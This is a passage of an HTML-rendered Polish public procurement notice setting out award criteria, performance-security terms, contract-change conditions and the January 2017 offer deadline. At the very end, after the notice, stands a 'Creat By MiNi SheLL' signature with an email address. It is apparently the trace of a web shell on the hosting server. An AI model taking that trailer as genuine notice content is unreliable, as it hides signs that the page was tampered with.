niemożliwe z przyczyn leżących po stronie Wykonawcy; 
- wykonawca w  odpowiedzi na wezwanie, o którym mowa w art. 26 
ust.  3  i  3a    ustawy  Pzp,  z  przyczyn  leżących  po  jego  stronie,  nie  złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której  mowa  w  art.  87  ust.  2  pkt  3  ustawy  Pzp,  co  spowodowało  brak możliwości     wybrania     oferty     złożonej     przez     wykonawcę     jako najkorzystniejszej.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>długość okresu gwarancji </td><td>10.00</td></tr><tr><td>termin realizacji</td><td>30.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">Wykonawca,  którego  oferta  zostanie  wybrana  jako  najkorzystniejsza, 
zobowiązany  jest  do  wniesienia  zabezpieczenia  należytego  wykonania  umowy 
w wysokości  10%  całkowitej  ceny  brutto  podanej  w  ofercie.  Zabezpieczenie 
musi  być  wniesione  w pełnej  wysokości,  niezależnie  od  formy  jego  wniesienia, najpóźniej w dniu zawarcia umowy, ale przed jej podpisaniem. 

Zabezpieczenie  może  być  wniesione  w  jednej  lub  kilku  następujących 
formach: 
a)    pieniądzu, 
b)    poręczeniach      bankowych      oraz      poręczeniach      spółdzielczej      kasy 
oszczędnościowo-kredytowej, 
c)    gwarancjach bankowych, 
d)    gwarancjach ubezpieczeniowych, 
e)    poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy  z  dnia  9  listopada  2000  r.  o  utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości. 

Zabezpieczenie wnoszone w pieniądzu należy wpłacić na rachunek bankowy 
Zamawiającego:  BS  STEGNA  84  8308  0001  0006  1681  2000  0070.  W  tytule 
przelewu należy wpisać: Zabezpieczenie należytego wykonania umowy nr .... (nr 
umowy nadany przez Zamawiającego). 

Zabezpieczenie  w  innej  formie  niż  pieniądz  należy  złożyć  w  formie 
oryginału w siedzibie Zamawiającego. 

Poręczenia  bankowe,  gwarancje  bankowe  i  ubezpieczeniowe,  poręczenia 
udzielane przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z 
dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
muszą  nieodwołalnie  i  bezwarunkowo  zobowiązywać  odpowiednio  poręczyciela 
albo    gwaranta    do    zapłaty    kwoty    pieniężnej    na    pierwsze    wezwanie Zamawiającego,  w  wysokości  odpowiadającej  kwocie  zabezpieczenia  należytego wykonania umowy  sumy gwarancyjnej z tytułu niewykonania lub nienależytego wykonania umowy. Zabezpieczenie wniesione w tych formach wchodzi w życie i uzyskuje  moc  obowiązującą  od  podpisania  umowy  przez  obie  Strony,  tj.  przez Wykonawcę  i  Zamawiającego  i  będzie  ważne  w  wysokości  100%  do  dnia wykonania  zamówienia,  plus  30  dni.  Zabezpieczenie  z  tytułu  rękojmi  za  wady wniesione w ww. formach będzie ważne w wysokości 30% do dnia upływu okresu rękojmi plus 15 dni. Zabezpieczenie wniesione w tych formach powinno zawierać zastrzeżenie, że wszelkie spory dotyczące odpowiednio poręczenia albo gwarancji podlegają rozstrzygnięciu zgodnie z prawem Rzeczypospolitej Polskiej i podlegają kompetencjom sądu właściwego dla siedziby Zamawiającego. 

Zabezpieczenie  należytego  wykonania  Umowy  będzie  zwracane  przez 
Zamawiającego w następujący sposób: 
- 70 % wartości zabezpieczenia zostanie zwrócone w terminie 30 dni 
od dnia podpisania Protokołu Wykonania Umowy.   
- 30 % wartości zabezpieczenia zostanie zwrócone w terminie 15 dni 
po upływie terminu rękojmi za wady. 

Zamawiający   zwraca   zabezpieczenie   należytego   wykonania   Umowy 
wniesione  w  pieniądzu  wraz  z  odsetkami  wynikającymi  z  umowy  rachunku 
bankowego,   na   którym   było   ono   przechowywane,   pomniejszone   o   koszt 
prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek 
wykonawcy.  

Zamawiający  na  żądanie  wnoszącego  zabezpieczenie  zwraca  oryginał 
dokumentu  potwierdzającego  wniesienie  zabezpieczenia  w  innej  formie  niż 
pieniądze, pozostawiając w dokumentacji jego kopię poświadczoną za zgodność z 
oryginałem. Zwrot oryginału dokumentu możliwy jest tylko po upływie okresu, na 
jaki wniesiono zabezpieczenie. </div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Przewiduje  się  możliwość  dokonania  zmian  w  umowie  w  przypadkach 
wynikających wprost z przepisów o zamówieniach publicznych oraz na warunkach 
określonych  w  niniejszym  punkcie.  Wystąpienie  którejkolwiek  z  okoliczności wskazanych   w   niniejszym   punkcie   nie   stanowi   zobowiązania   Stron   do wprowadzenia zmiany.

Zamawiający   dopuszcza   wprowadzenie   zmian   w   terminie   wykonania 
Przedmiotu Umowy w następujących okolicznościach: 
- zmiany      spowodowane      warunkami      atmosferycznymi,      w 
szczególności: 
- klęski żywiołowe; 
- warunki    atmosferyczne    uniemożliwiające    prowadzenie    robót 
budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów; 
- zmiany  spowodowane  warunkami  geologicznymi,  archeologicznymi 
lub  terenowymi,  w  szczególności  odmienne  od  przyjętych  w  specyfikacji 
technicznej  warunki  geologiczne  (kategorie  gruntu,  kurzawka,  itp.)  lub 
warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji 
lub obiektów infrastrukturalnych; 
- zmiany  będące  następstwem  działania  organów  administracji  i 
innych  podmiotów  o  kompetencjach  zbliżonych  do  organów  administracji  w 
szczególności  eksploatatorów  infrastruktury  oraz  właścicieli  gruntów  pod 
inwestycję, które spowodowały niezawinione i niemożliwe do uniknięcia przez 
Wykonawcę opóźnienie w szczególności: 
a- przekroczenie  zakreślonych  przez  prawo  lub  regulaminy,  a  jeśli 
takich regulacji nie ma  typowych w danych okolicznościach, terminów 
wydawania  przez  organy  administracji  lub  inne  podmioty  decyzji, 
zezwoleń, uzgodnień itp.; 
b- odmowa  wydania  przez  organy  administracji  lub  inne  podmioty 
wymaganych  decyzji,  zezwoleń,  uzgodnień  z  przyczyn  niezawinionych 
przez  Wykonawcę,  w  tym  odmowa  udostępnienia  przez  właścicieli 
nieruchomości do celów realizacji inwestycji; 

Zamawiający     dopuszcza     wprowadzenie     zmian     technicznych     i 
technologicznych w przedmiocie (zmiany sposobu spełnienia  
świadczenia), w przypadku gdy wystąpi: 
- konieczność  zrealizowania  Przedmiotu  Umowy  przy  zastosowaniu 
innych rozwiązań technicznych/technologicznych niż wskazane w Specyfikacji 
Technicznej,  w  sytuacji,  gdyby  zastosowanie  przewidzianych  rozwiązań 
groziło niewykonaniem lub wadliwym wykonaniem projektu, 
- odmienne   od   przyjętych   w   Specyfikacji   Technicznej   warunki 
geologiczne  (kategorie  gruntu,  kurzawka,  itp.)  skutkujące  niemożliwością 
zrealizowania   przedmiotu   umowy   przy   dotychczasowych   założeniach 
technologicznych    lub    warunki    terenowe,    w    szczególności    istnienie 
podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych; 
- konieczność  zrealizowania  Przedmiotu  Umowy  przy  zastosowaniu 
innych  rozwiązań  technicznych  lub  materiałowych  ze  względu  na  zmiany 
obowiązującego prawa; 

Zamawiający  dopuszcza  zmianę  osób,  przy  pomocy  których  Wykonawca 
realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi 
uprawnieniami,  o  których  mowa  w  ustawie  Prawo  budowlane  lub  innych 
ustawach, w szczególności kierownika budowy. 

Zamawiający   dopuszcza   wprowadzenie   zmian   w   zakresie   sposobu 
organizacji spełnienia świadczenia:  
- Zmiana  Procedury  Odbioru  Przedmiotu  Umowy,  jeśli  nie  zmniejszy 
to zasad bezpieczeństwa i nie spowoduje zwiększenia kosztów dokonywania 
odbiorów, które obciążałyby zamawiającego  
- Zmiana treści dokumentów przedstawianych wzajemnie przez strony 
w  trakcie  realizacji  umowy  lub  sposobu  informowania  o  realizacji  umowy. 
Zmiana ta nie może spowodować braku informacji niezbędnych Stronom do 
prawidłowej realizacji umowy 

Ponadto zamawiający dopuszcza wprowadzenie zmian w przypadku: 
- wystąpienia  siły  wyższej  uniemożliwiającej  wykonanie  Przedmiotu 
Umowy  zgodnie  z  Umową  tj.  zdarzenia  o  charakterze  przypadkowym  lub 
naturalnym  (żywiołowym),  niezależnego  od  woli  stron  i  niemożliwego  do 
uniknięcia  (np.  katastrofalne  działania  przyrody  (np.  niezwykłe  mrozy,   
tj.  utrzymującą  się  przez  14  dni  temperatura  powietrza  poniżej  -10),  akty władzy  ustawodawczej  i  wykonawczej  (np.  wywłaszczenie)  oraz  niektóre zaburzenia życia zbiorowego (np. zamieszki uliczne). 
- zmiana  obowiązującej  stawki  VAT;  Jeśli  zmiana  stawki  VAT  będzie 
powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, 
Zamawiający  dopuszcza  możliwość  zwiększenia  wynagrodzenia  o  kwotę 
równą różnicy w kwocie podatku zapłaconego przez Wykonawcę.  

Nie stanowi zmiany umowy zmiana harmonogramu rzeczowo-finansowego 
nie wpływająca na termin wykonania całości zamówienia. 

W  przypadku  wystąpienia  którejkolwiek  z   okoliczności  wymienionych  
w  pkt  18.3.1  -  18.3.4  oraz  18.7.1,  termin  wykonania  Umowy  może  ulec 
odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej
przedmiotu  w  sposób  należyty,  nie  dłużej  jednak  niż  o  okres  trwania  tych 
okoliczności. 

Wykonawca  nie  może  żądać  odszkodowania,  zwiększenia  wynagrodzenia 
lub  zwrotu  innych  kosztów  bezpośrednich  lub  pośrednich  spowodowanych,  za wyjątkiem okoliczności wskazanych w Umowie: 
- okoliczności,  o  których  mowa  w  pkt  18.4.1  oraz  18.4.3  niniejszej 
SIWZ ze względów wynikających z błędów projektowych lub nieprawidłowych 
ustaleń stanowiących podstawę wykonania projektu lub zmian prawa; 
- zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego 
na  podstawie  art.  2  ust.  3-5  ustawy  z  dnia  10  października  2002  r.  o minimalnym wynagrodzeniu za pracę, 
- zasad  podlegania  ubezpieczeniom  społecznym  lub  ubezpieczeniu 
zdrowotnemu  lub  wysokości  stawki  składki  na  ubezpieczenia  społeczne  lub 
zdrowotne  -  jeżeli  zmiany  te  będą  miały  wpływ  na  koszty  wykonania  zamówienia  przez Wykonawcę, a Wykonawca udowodni, że przedmiotowe zmiany miały wpływ na koszt wykonania przez niego zamówienia. 

Zmiany podmiotowe: 
- kumulatywne  przystąpienie  do  długu  przez  podmiot,  który  wykaże 
że  nie  zachodzą  wobec  niego  przesłanki  wykluczenia,  które  zamawiający 
wskazał wobec Wykonawcy; 
- zastąpienie  dotychczasowego  wykonawcy  innym  podmiotem,  który 
przejmując wszelkie obowiązki dotychczasowego wykonawcy wykona Umowę 
na  warunkach  nie  gorszych  oraz  wykaże  że  nie  zachodzą  wobec  niego 
przesłanki  wykluczenia  z  postępowania  i  spełnia  tak  jak  dotychczasowy 
wykonawca warunki udziału w postępowaniu; 
- zastąpienie  dotychczasowego  wykonawcy  innym  podmiotem,  który 
przejmie  szczegółowo  wskazane  obowiązki  dotychczasowego  wykonawcy 
wykona  Umowę  na  warunkach  nie  gorszych  oraz  wykaże  że  nie  zachodzą 
wobec  niego  przesłanki  wykluczenia  z  postępowania,  jeśli  dotychczasowy 
wykonawca   zgodzi   się   na   potrącenie   ze   swojego   wynagrodzenia   kar 
umownych,  a  także  na  ponoszenie  odpowiedzialności  odszkodowawczej 
wobec  zamawiającego  i  innych  podmiotów,  które  poniosły  szkodę  wskutek 
nie  wykonania  lub  nieprawidłowego  wykonania  obowiązków  przez  podmiot, 
który przejął obowiązki wykonawcy. 

Każda zmiana i uzupełnienie Umowy wymaga formy pisemnej pod rygorem 
nieważności (Aneks). 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 18/01/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Zamawiający może zastosować procedurę, o której mowa w art. 24aa ust. 1 ustawy Pzp tj.  najpierw  dokona  oceny  ofert,  a  następnie  zbada,  czy wykonawca,  którego oferta  została  oceniona  jako  najkorzystniejsza,  nie  podlega  wykluczeniu  oraz spełnia warunki udziału w postępowaniu. </div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com